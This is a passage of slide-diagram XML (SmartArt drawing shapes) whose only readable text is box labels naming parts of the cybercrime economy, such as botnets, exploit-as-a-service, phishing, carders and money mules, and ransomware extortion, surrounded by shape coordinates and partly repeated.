                <a:pt x="2941486" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2941486"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D2CCC9-A5CD-45F3-BA34-8716B2A7CFB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3669420" y="2645968"/>
          <a:ext cx="4460805" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="4460805" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="4460805"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159A7B-5084-481D-94B7-435977B6A330}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1572976" y="3955063"/>
          <a:ext cx="577124" cy="450386"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="577124" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="577124" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="450386"/>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1BCCB0-2588-4D93-98C8-3D49C52437B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2150101" y="2645968"/>
          <a:ext cx="5980125" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="5980125" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="5980125"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EDCBD1-A1A5-439E-8E90-B317445DC7F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="630781" y="2645968"/>
          <a:ext cx="7499444" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="7499444" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="7499444"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3B26D2-9048-4DFE-9E37-9E8A6613E98D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8084506" y="1495084"/>
          <a:ext cx="91440" cy="361528"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="361528"/>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1B31C6-CC49-4888-BF15-7D36EC2364E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7174466" y="705728"/>
          <a:ext cx="1911520"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D6E11A-7365-4E7C-A174-08A7BBA7C802}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7312586" y="836942"/>
          <a:ext cx="1911520"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Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7335705" y="860061"/>
        <a:ext cx="1865282" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F02E4111-56B6-4851-B9BF-62C394FB9F4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7508686" y="185661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C837EB-A120-4D0E-8C3A-E5BD7C1394E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7646806" y="198782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Botnets</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7669925" y="2010946"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F042C109-58FD-4EC0-A229-3030AD4E6457}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9242"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762C1A-05A0-4F4D-9899-D4D3AACE82D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="147362"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Stolen Account Credentials</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="170481" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A91D7A60-2849-4955-85BF-A221EF3D6555}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1528561"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79D77-7F05-4916-BFF3-E71C68B238E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1666681"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Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1689800" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0ABA8841-2E13-4EE7-9600-D939414EE2BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="951437" y="4405450"/>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7F7E9-9C03-4C4C-9760-95BB29039A01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1089557" y="4536664"/>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Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1112676" y="4559783"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D25DF860-47FD-42F0-B603-5671C9C185E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3047880"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C6BE09-6C35-45D2-A751-D4BF107EE4F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3186000"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DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3209119" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2EBA7DD-B67B-4866-B7D0-1EDF7294D4EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4567200"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87343F-C488-4AC1-A4FD-C02C38DCC47B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4705320"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Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4728439" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6086519"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B2796D-E837-4404-9852-61F32C250BFA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6224639"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Spam</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6247758" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47F209D6-A50F-4593-8101-495466DA161C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2885373"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17AD6-2A5A-4CC4-817B-C33D1FB1B247}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023493"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Phishing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3046612" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4404692"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825871-887C-4144-92E4-0CD1C779523E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4542812"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Pharma</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4565931" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5924011"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9CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6062131"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Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6085250" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7516387" y="4388557"/>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75C67-9F60-4DCF-8A09-6EBB5AA047F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7654506" y="451977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Fake Anti-virus</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7677625" y="4542890"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8962650"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493045-F4D0-49BB-8749-0235A8D3915E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9100770"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Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9123889" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A20E9766-61CD-4711-B99D-41622BFCA782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7605839"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F22F3-AC19-46C9-A82F-89D8DB189CE8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7743958"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Click Fraud and Ad Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7767077" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9125158"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3FE0F9-C0AD-41ED-8499-585D4FDF8177}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9263278"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Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9286397" y="3320040"/>
        <a:ext cx="1196841" cy="7431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BD6A2-C6A6-4AE7-8716-F62AC787B4F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="1616471" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471"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CAA67D-ED33-4120-9634-DF98516FB005}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="97152" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152"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B922D2-A971-46B6-8A66-A63871EC5D71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="2876130" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2876130" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="287613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64DF9C-47B4-4930-BF8C-FB83C56F57E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="1429867" cy="433494"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="433494"/>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97DC07-675E-4CF3-9913-C7CB3E6FE0DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6545551" y="3955063"/>
          <a:ext cx="162507" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="162507" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="162507"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3BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5026232" y="3955063"/>
          <a:ext cx="1681827" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1681827" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1681827"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DC0BED-9251-4B5C-8191-EE587DFF262E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3506912" y="3955063"/>
          <a:ext cx="3201146" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3201146" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3201146" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="4313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8E46D9-FBC5-4AA6-9A5D-86A5A084592D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="2645968"/>
          <a:ext cx="1422167" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1422167" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1422167"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B06ADF-5D22-4867-A9A8-3ACC6EA49E1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5188740" y="2645968"/>
          <a:ext cx="2941486" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2941486" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2941486"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D2CCC9-A5CD-45F3-BA34-8716B2A7CFB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3669420" y="2645968"/>
          <a:ext cx="4460805" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="4460805" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="4460805"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159A7B-5084-481D-94B7-435977B6A330}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1572976" y="3955063"/>
          <a:ext cx="577124" cy="450386"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="577124" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="577124" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="450386"/>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1BCCB0-2588-4D93-98C8-3D49C52437B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2150101" y="2645968"/>
          <a:ext cx="5980125" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="5980125" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="5980125"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EDCBD1-A1A5-439E-8E90-B317445DC7F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="630781" y="2645968"/>
          <a:ext cx="7499444" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="7499444" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="7499444" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="51973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3B26D2-9048-4DFE-9E37-9E8A6613E98D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8084506" y="1495084"/>
          <a:ext cx="91440" cy="361528"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="361528"/>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1B31C6-CC49-4888-BF15-7D36EC2364E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7174466" y="705728"/>
          <a:ext cx="1911520"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D6E11A-7365-4E7C-A174-08A7BBA7C802}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7312586" y="836942"/>
          <a:ext cx="1911520"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Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7335705" y="860061"/>
        <a:ext cx="1865282" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F02E4111-56B6-4851-B9BF-62C394FB9F4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7508686" y="185661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C837EB-A120-4D0E-8C3A-E5BD7C1394E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7646806" y="198782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Botnets</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7669925" y="2010946"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F042C109-58FD-4EC0-A229-3030AD4E6457}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9242"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762C1A-05A0-4F4D-9899-D4D3AACE82D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="147362"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Stolen Account Credentials</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="170481" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A91D7A60-2849-4955-85BF-A221EF3D6555}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1528561"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79D77-7F05-4916-BFF3-E71C68B238E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1666681"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Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1689800" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0ABA8841-2E13-4EE7-9600-D939414EE2BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="951437" y="4405450"/>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7F7E9-9C03-4C4C-9760-95BB29039A01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1089557" y="4536664"/>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Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1112676" y="4559783"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D25DF860-47FD-42F0-B603-5671C9C185E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
